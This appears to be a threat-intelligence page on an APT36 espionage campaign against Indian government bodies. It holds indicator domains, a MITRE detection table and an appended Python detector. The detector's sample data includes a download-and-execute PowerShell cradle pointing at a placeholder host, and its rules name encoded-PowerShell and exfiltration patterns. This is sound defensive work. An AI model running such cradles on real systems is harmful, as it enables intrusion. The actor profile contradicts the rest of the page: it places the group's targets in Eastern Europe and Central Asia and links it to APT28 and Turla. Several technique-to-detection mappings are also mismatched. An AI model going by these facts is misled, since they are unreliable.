
APT36 (Transparent Tribe) Sheet Attack Campaign

Tags: APT36, FIREPOWER, SheetCreep, India Espionage, Vibeware

A Pakistan-linked threat cluster, assessed with medium confidence to be APT36 (Transparent Tribe) or a closely aligned sub-group, is conducting sustained cyber-espionage against Indian government entities. The latest iteration layers two freshly borrowed Microsoft CVEs (CVE-2026-21509 / CVE-2026-21513) onto an existing delivery chain of weaponized RTF documents and LNK shortcuts, deploying the updated FIREPOWER backdoor against broad Indian targets and dropping a fresh SHEETCREEP build alongside a new CrystalShell-over-Slack variant specifically against a Kashmir-focused target. Crystal, .NET, and PowerShell toolchains run simultaneously from what researchers call a "vibeware factory".

Indicators of Compromise

hcidoc.in
hciaccounts.in

APT Groups (1)

Operation C-Major (PK)

Summary of Actor: Operation C-Major is a cyber espionage campaign attributed to a sophisticated threat group. The operation is known for targeting government and diplomatic entities in Eastern Europe and Central Asia. It employs a variety of attack vectors, including spear-phishing and malware.

General Features: The group behind Operation C-Major is known for deploying custom malware and sophisticated evasion techniques. They are highly persistent and often use local language in their phishing campaigns to increase trust.

Related Other Groups: APT28, Turla

Indicators of Attack (IoA):
- Suspicious email attachments
- Unusual network traffic to external servers
- Usage of compromised legitimate credentials

Recent Activities and Trends:
- Latest Campaigns: Recent campaigns have focused on exploiting vulnerabilities in widely-used software to gain initial access. There have been reports of increased phishing emails mimicking government communications.
- Emerging Trends: The group has shown a shift towards more sophisticated spear-phishing techniques, including the use of deepfake technology to impersonate key individuals. Additionally, there is an increased focus on zero-day vulnerabilities.

Aliases: APT 36, APT36, C-Major, COPPER FIELDSTONE, Earth Karkaddan, Green Havildar, Mythic Leopard, ProjectM, Storm-0156, TMP.Lapis, Transparent Tribe

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION/DETECTION

Source: attack.mitre.org

Columns: Technique ID, Technique Name, Detection ID, Detection Name, Recommended Detection Action

T1566.001  Phishing: Spearphishing Attachment
  Detection: DET0115  Spearphishing Attachment Detection
  Action: Alert on email delivery of RTF files with OLE objects or LNK shortcuts to Indian government domains; inspect for CVE-2026-21509 shellcode triggers.

T1566.002  Phishing: Spearphishing Link
  Detection: DET0116  Spearphishing Link Detection
  Action: Block links directing Indian Windows users to threat-actor controlled ZIP delivery servers using geofencing + User-Agent checks (hcidoc[.]in).

T1204.002  User Execution: Malicious File
  Detection: DET0294  Malicious File Execution Detection
  Action: Alert on .LNK files opened from Downloads or Temp directories that spawn PowerShell with -e (Base64 encoded) or Invoke-RestMethod | iex.

T1059.001  Command and Scripting Interpreter: PowerShell
  Detection: DET0455  PowerShell Behavioral Detection
  Action: Detect irm [url] | iex patterns and PowerShell spawned by chrome.exe, edge.exe or non-browser binaries polling Firebase/Google Sheets.

T1106  Native API
  Detection: DET0459  Non-Standard Scripting Language Execution
  Action: Flag execution of binaries compiled in niche languages (Crystal, Nim, Zig) not present in standard software baselines on government endpoints.

T1105  Ingress Tool Transfer
  Detection: DET0060  Ingress Tool Transfer Detection
  Action: Monitor curl/PowerShell download of ZIP archives from actor-controlled domains; alert on hcidoc[.]in and similar typosquatted .in domains.

T1112  Modify Registry
  Detection: DET0280  Registry Modification Detection
  Action: Alert on scheduled task creation by PowerShell running from %USERPROFILE% that persists LNK-launched FIREPOWER at user logon.

T1140  Deobfuscate/Decode Files or Information
  Detection: DET0275  Deobfuscation/Decode Detection
  Action: Detect Assembly.Load of byte-reversed PE buffers (details.png reversal) via ETW or AMSI telemetry in the .NET runtime.

T1219  Remote Access Tools
  Detection: DET0496  Remote Access Tool Detection
  Action: Flag non-IT-deployed remote access: SHEETCREEP polling Google Sheets every 3s, FIREPOWER polling Firebase every 120–300s, MAILCREEP polling an Azure mailbox.

T1082  System Information Discovery
  Detection: DET0190  System Information Discovery Detection
  Action: Alert on PowerShell enumeration of C:\Program Files, %USERPROFILE%\Desktop, and Downloads immediately after LNK execution.

T1083  File and Directory Discovery
  Detection: DET0192  File and Directory Discovery Detection
  Action: Detect scanning of .txt, .csv, .pdf, .docx, .xlsx, .pptx, .html files in Desktop/Documents/OneDrive by non-user processes (document stealer).

T1567.001  Exfiltration Over Web Service: Exfiltration to Code Repository
  Detection: DET0420  Exfiltration to Code Repository Detection
  Action: Alert on git push or REST API calls to private GitHub repos from workstations during non-business hours (document stealer upload).

T1546.005  Event Triggered Execution: Trap
  Detection: DET0145  Scheduled Task / Logon Script Detection
  Action: Detect GServices.vbs registered as a logon scheduled task loading SHEETCREEP via PowerShell reflection at each user logon.

T1552.001  Unsecured Credentials: Credentials In Files
  Detection: DET0200  Credential in Files Detection
  Action: Alert on MAILCREEP reading credential material from the filesystem to authenticate against the Microsoft Graph API / Azure tenant.

T1071.001  Application Layer Protocol: Web Protocols
  Detection: DET0425  C2 over Web Protocols Detection
  Action: Detect HTTPS C2 to the Google Sheets API, Firebase Realtime Database, and Microsoft Graph API from non-browser processes; baseline normal traffic and alert on anomalies.
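The T1204.002 and T1059.001 rows above describe three PowerShell behaviours to alert on: an encoded command launched from a Downloads or Temp directory, an irm/Invoke-RestMethod cradle piped into iex, and PowerShell spawned by a browser. The following is an added example of that detection logic run over constructed Sysmon-style process-creation events; it is not code from the page or from any vendor, and the field names, sample paths and the example.invalid URL are assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon-style field names), not real telemetry.
# The Base64 blob decodes to UTF-16LE "ABC" and stands in for a real encoded command.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "current_directory": r"C:\Users\analyst\Downloads",
     "command_line": "powershell.exe -w hidden -e QQBCAEMA"},
    {"parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "current_directory": r"C:\Users\analyst",
     "command_line": 'powershell -c "irm https://example.invalid/stage | iex"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "current_directory": r"C:\Users\analyst\Documents",
     "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
BROWSERS = re.compile(r"\\(chrome|msedge|firefox)\.exe$", re.I)
# -e / -ec / -en / -enc / -EncodedCommand followed by a payload token
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\s+\S", re.I)
# download cradle: irm/iwr (or their long forms) piped into iex/Invoke-Expression
DOWNLOAD_PIPE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b.*\|\s*(iex|invoke-expression)\b", re.I)
STAGING_DIRS = re.compile(r"\\(Downloads|Temp)(\\|$)", re.I)


def classify(event):
    """Return the detection labels matching one process-creation event (empty if benign)."""
    if not POWERSHELL.search(event["image"]):
        return []
    hits = []
    cmd = event["command_line"]
    if DOWNLOAD_PIPE.search(cmd):
        hits.append("download-cradle-irm-iex")                # T1059.001 / DET0455
    if ENCODED_FLAG.search(cmd) and STAGING_DIRS.search(event["current_directory"]):
        hits.append("encoded-powershell-from-staging-dir")    # T1204.002 / DET0294
    if BROWSERS.search(event["parent_image"]):
        hits.append("powershell-child-of-browser")            # T1059.001 / DET0455
    return hits


def scan(events):
    """Return (index, labels) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        labels = classify(event)
        if labels:
            results.append((i, labels))
    return results
```

Tune STAGING_DIRS and BROWSERS to the endpoint baseline before deploying; the -e flag check deliberately requires a following token so that -ExecutionPolicy is not matched.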


Observed Countries (1)

IN (519)